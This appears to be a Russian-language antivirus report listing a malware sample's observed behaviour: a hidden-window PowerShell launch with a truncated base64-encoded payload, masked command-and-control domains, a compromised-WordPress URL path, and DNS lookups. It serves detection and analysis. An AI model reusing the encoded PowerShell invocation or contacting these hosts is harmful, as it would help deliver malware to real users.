Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASwBqAGUAdABmAGoAdwB6AGoAaQBjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFoAaABrAGoAagBhAHoAbwBmAGoAcQAgACMAPgAgACQAQQBuAHEAbwBoAGIAbwBkAGgAPQAnAEwAZg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
- %TEMP%\1386474.cvr
- 'ar###ore.com.vn':443
- 'pe###trade.hu':443
- 'ne#.#adar.kz':80
- http://ne#.#adar.kz/wp-includes/j154/
- 'ar###ore.com.vn':443
- 'pe###trade.hu':443
- DNS ASK ar###ore.com.vn
- DNS ASK ep###etwork.cf
- DNS ASK sr######kshmiborewell.in
- DNS ASK pe###trade.hu
- DNS ASK ne#.#adar.kz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASwBqAGUAdABmAGoAdwB6AGoAaQBjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFoAaABrAGoAagBhAHoAbwBmAGoAcQAgACMAPgAgACQAQQBuAHEAbwBoAGIAbwBkAGgAPQAnAEwAZg...' (со скрытым окном)